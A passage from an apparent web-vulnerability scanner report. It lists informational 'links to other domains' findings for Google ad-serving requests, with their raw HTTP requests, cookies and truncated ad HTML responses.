oA7oC9QMAAADE%26num%3D1%26sig%3DAGiWqtzuPG6q0jVCOhNFf41QahYCZvIK1Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBGKG7LtONTaX3GZXtlQe30Y3JDNbuheEBnru7zhGWk9-WSbDdrAEQARgBIL7O5Q04AFCN29fFBGDJBqAB7vLJ-QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQTaAV9odHRwOi8veHNzLmN4L2V4YW1wbGVzL2h0bWwvc3RvcmVkLXhzcy1kb3JrLXBlcm1hbmVudC1jcm9zcy1zaXRlLXNjcmlwdGluZy5vcmRlci4xYW5kMS5jb20uaHRtbIACAbgCGMACBcgC_uyTFKgDAegD3AXoA7oC9QMAAADE%26num%3D1%26sig%3DAGiWqtzuPG6q0jVCOhNFf41QahYCZvIK1Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/stored-xss-dork-permanent-cross-site-scripting.order.1and1.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGeNNW-x_bQJ-_d1qwgDxyJ_NCdBQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.57. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301103804&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fstored-xss-dork-permanent-cross-site-scripting.order.1and1.com.html&dt=1301085803907&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301085804981&frm=0&adk=1607234649&ga_vid=981209188.1301085805&ga_sid=1301085805&ga_hid=275507554&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&fu=0&ifi=1&dtd=1122&xpc=NEUzooNX0P&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 20:42:36 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4692
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
oA7oC9QMAAADE%26num%3D1%26sig%3DAGiWqty8oazXCVHLN1cSsoMz8WtBY1-Nng%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYTdEPP6MTbzGHsHKsQeirZHNDtbuheEBnru7zhGWk9-WSdCtcxABGAEgvs7lDTgAUI3b18UEYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBYGZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvc3RvcmVkLXhzcy1kb3JrLXBlcm1hbmVudC1jcm9zcy1zaXRlLXNjcmlwdGluZy5vcmRlci4xYW5kMS5jb20uaHRtbIACAbgCGMACBcgC_uyTFKgDAegD3AXoA7oC9QMAAADE%26num%3D1%26sig%3DAGiWqty8oazXCVHLN1cSsoMz8WtBY1-Nng%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/stored-xss-dork-permanent-cross-site-scripting.order.1and1.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHsisM7nS9p2Uu1LfabaWCykgLPmg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.58. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098641&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fhmficweb.hinghammutual.com_80-billingview.htm&dt=1301080641657&bpp=5&shv=r20110315&jsv=r20110321-2&correlator=1301080641774&frm=0&adk=1607234649&ga_vid=431782132.1301080642&ga_sid=1301080642&ga_hid=218195279&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=141&xpc=3fpyMiITgh&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:16:33 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12378
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/hmficweb.hinghammutual.com_80-billingview.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.icpa4kids.com/seminars%26adT%3DPediatric%2BSeminars%26adU%3Dwww.MedicareSupplement360.com%26adT%3DMedicare%2BSupplement%2BRates%26adU%3DMetLife.com%26adT%3DMetLife%2BLife%2BInsurance%26gl%3DUS&amp;usg=AFQjCNHFnB81YrdNe1om9oaNG_133d4cBA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.59. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121467&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Fsubscription-services&dt=1301103516810&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103516833&frm=0&adk=3965760877&ga_vid=962729956.1301103517&ga_sid=1301103517&ga_hid=344159779&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&ref=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fcoastwise&fu=0&ifi=1&dtd=49&xpc=CuT7LVsTh9&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 01:37:48 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 10770
X-XSS-Protection: 1; mode=block

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:728px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf">
...[SNIP]...
53DImageAd%2526gl%253DUS%26usg%3DAFQjCNFMZ7M7oO5N-LK8WOBc6qOJNeuL_A&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed"><EMBED src="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="google_xml_addata=%3CTEMPLATE_PARAMETERS%3E%3CNO_CONTAINER_XML/%3E%3CTEMPLATE_WIDTH%3E728%3C/TEMPLATE_WIDTH%3E%3CTEMPLATE_HEIGHT%3E90%3C/TEMPLATE_HEIGHT%3E%3CTEMPLATE_URL%3Ehttp%3A//pagead2.googlesyndication.com/pagead/gadgets/all_V25/all_V25_spec_728_90.swf%3C/TEMPLATE_URL%3E%3CTEMPLATE_AIT_URL%3Ehttp%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DB-_C1bEONTZ-uKJXulQfYjJmVA5i79tIBtvrsrg7AjbcB8NccEAEYASD7ieIQOABQ2Offq_7_____AWDJBqABtYO3_wOyARd3d3cuc291bmRpbmdzb25saW5lLmNvbboBCTcyOHg5MF9hc8gBBNoBNGh0dHA6Ly93d3cuc291bmRpbmdzb25saW5lLmNvbS9zdWJzY3JpcHRpb24tc2VydmljZXOAAgG4AhjIApDGrQHQAgGoAwHoA8sD6AOcA_UDAAAAxA%26amp%3Bsigh%3DI7iUZxYXllg%26amp%3Blabel%3D_AITNAME_%26amp%3Bvalue%3D_AITVALUE_%3C/TEMPLATE_AIT_URL%3E%3CTEMPLATE_ELEMENT+element_name%3D%22adData%22+index%3D%220%22%3E%3CTEMPLATE_FIELD+field_name%3D%22adName%22%3EAll+You%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFText%22%3EAll+You+Magazine%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFont%22%3Efranklingothic_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFText%22%3EUp+to+90%25+Off+Subscriptions+Here!%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFont%22%3Efuturabc%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22product1MCImage%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCOe8jbXYxb3BBhB5GKEBMggZ0WjGFve5dQ%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFText%22%3EShop+Now%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFont%22%3Efuturabc%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextColor%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22square3Color%22%3E0xCC0000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22back1MCColor1%22%3E0x0066CC%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22back1MCColor2%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrl%22%3Ewww.Magazines.com%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrlColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22destinationUrl%22%3Ehttp%3A//www.magazines.com/product/all-you%3Fafd_number%3D3823%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontName%22%3E_franklingothic_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCKzO5_OBh8u_5QEQ____________ARj___________8BMgh1-vfDCk3umQ%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFontName%22%3E_futurabc%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCKzO5_OBh8u_5QEQ____________ARj___________8BMgh1-vfDCk3umQ%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontName%22%3E_futurabc%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCKzO5_OBh8u_5QEQ____________ARj___________8BMgh1-vfDCk3umQ%3C/TEMPLATE_FIELD%3E%3C/TEMPLATE_ELEMENT%3E%3C/TEMPLATE_PARAMETERS%3E&google_width=728&google_height=90&destination_url=http%3A//www.magazines.com/product/all-you%3Fafd_number%3D3823&display_url=www.Magazines.com&google_click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-_C1bEONTZ-uKJXulQfYjJmVA5i79tIBtvrsrg7AjbcB8NccEAEYASD7ieIQOABQ2Offq_7_____AWDJBqABtYO3_wOyARd3d3cuc291bmRpbmdzb25saW5lLmNvbboBCTcyOHg5MF9hc8gBBNoBNGh0dHA6Ly93d3cuc291bmRpbmdzb25saW5lLmNvbS9zdWJzY3JpcHRpb24tc2VydmljZXOAAgG4AhjIApDGrQHQAgGoAwHoA8sD6AOcA_UDAAAAxA%26num%3D1%26sig%3DAGiWqtxp-XwXSwLp0ojkEnMrAfT6xkg5jw%26client%3Dca-pub-5812731941170583%26adurl%3D&google_ait_url=http%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DB-_C1bEONTZ-uKJXulQfYjJmVA5i79tIBtvrsrg7AjbcB8NccEAEYASD7ieIQOABQ2Offq_7_____AWDJBqABtYO3_wOyARd3d3cuc291bmRpbmdzb25saW5lLmNvbboBCTcyOHg5MF9hc8gBBNoBNGh0dHA6Ly93d3cuc291bmRpbmdzb25saW5lLmNvbS9zdWJzY3JpcHRpb24tc2VydmljZXOAAgG4AhjIApDGrQHQAgGoAwHoA8sD6AOcA_UDAAAAxA%26sigh%3DI7iUZxYXllg%26label%3D_AITNAME_%26value%3D_AITVALUE_&google_target_in_new_window=true&google_abg_url=http%3A//www.google.com/url%3Fct%3Dabg%26q%3Dhttps%3A//www.google.com/adsense/support/bin/request.py%253Fcontact%253Dabg_afc%2526url%253Dhttp%3A//www.soundingsonline.com/subscription-services%2526hl%253Den%2526client%253Dca-pub-5812731941170583%2526adU%253Dwww.Magazines.com%2526adT%253DImageAd%2526gl%253DUS%26usg%3DAFQjCNFMZ7M7oO5N-LK8WOBc6qOJNeuL_A&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed" TYPE="application/x-shockwave-flash" AllowScriptAccess="always" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
20.60. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098555&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fstored-xss-www.supermedia.com_443.htm&dt=1301080555715&bpp=6&shv=r20110315&jsv=r20110321-2&correlator=1301080555747&frm=0&adk=1607234649&ga_vid=1067466933.1301080556&ga_sid=1301080556&ga_hid=378297881&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=83&xpc=nKqfupVLZJ&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:15:07 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4618
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ">
...[SNIP]...
oA8cG9QMCAADE%26num%3D1%26sig%3DAGiWqtxtbRYtGcVqjhBZMuOVSeCzG24cpw%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB4EI9u-mMTYGSC5bulQefrtTlB97theEB7rG7zhGWk9-WSeDlpAEQARgBIL7O5Q04AFD-ueqD-P____8BYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBSGZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvc3RvcmVkLXhzcy13d3cuc3VwZXJtZWRpYS5jb21fNDQzLmh0bYACAbgCGMACBcgC_uyTFKgDAegD6QHoA8cG9QMCAADE%26num%3D1%26sig%3DAGiWqtxtbRYtGcVqjhBZMuOVSeCzG24cpw%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/stored-xss-www.supermedia.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHIou1azdfI2nRWf_5COFjniT0SjA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.61. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098600&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fsql-injection-second-order-www.insideup.com_80.htm&dt=1301080600733&bpp=5&shv=r20110315&jsv=r20110321-2&correlator=1301080600848&frm=0&adk=1607234649&ga_vid=1374413370.1301080601&ga_sid=1301080601&ga_hid=198338624&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=139&xpc=whu8wi9S7I&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
